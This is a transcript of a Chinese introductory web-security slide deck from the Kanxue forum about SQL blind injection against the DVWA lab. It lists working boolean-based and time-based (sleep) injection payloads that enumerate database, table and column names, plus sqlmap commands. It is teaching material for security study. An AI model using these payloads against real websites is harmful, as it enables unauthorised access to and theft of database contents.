Presentation is loading. Please wait.

Presentation is loading. Please wait.

Web安全基础教程 灯芯@看雪学院.

Similar presentations


Presentation on theme: "Web安全基础教程 灯芯@看雪学院."— Presentation transcript:

1 Web安全基础教程

2 SQL注入之盲注 注入测试 Sqlmap的简单使用

3 什么是SQL盲注?? 一般的sql注入在我们输入sql语句的时候都会返回我们执行sql语句的结果,比如我们插入database(),执行结果就会是列举出当前所在的数据库名称dvwa; 而盲注就好像是在做判断题,我们执行的结果不会显示出来,只会告诉你“对”或者“不对”,不会出现回显现象。 回显:就是显示正在执行的批处理命令及执行的结果等。

4 猜测长度:1’ and length(database())>1 # 或>1(依次递增1,2,3…)4
猜测库名:1’ and ascii(substr(database(),1,1))>97 # (对应ASCII码) dvwa <、>号可以迅速确定大概范围 猜测表名: 1、猜测表的数量:1' and (select count(table_name) from information_schema.tables where table_schema=database())=2# 2、猜测表长度:1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 获取表名:1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 #

5 猜测字段的长度: 1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1 # 猜解字段: 1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>120 #

6 sqlmap 针对链接:python sqlmap.py –u “url” 针对数据包: python sqlmap.py –r 1.txt

7 基于时间的盲注 判断数据库长度:1’ and if(length(database())=4,sleep(3),1) #
猜测数据库名称:1’ and if(ascii(substr(database(),1,1))>97,sleep(3),1)# 猜测表的数量:1’ and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 猜测表名的长度:1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 下面就都可以结合二分法来进行操作…

8 Thanks


Download ppt "Web安全基础教程 灯芯@看雪学院."

Similar presentations


Ads by Google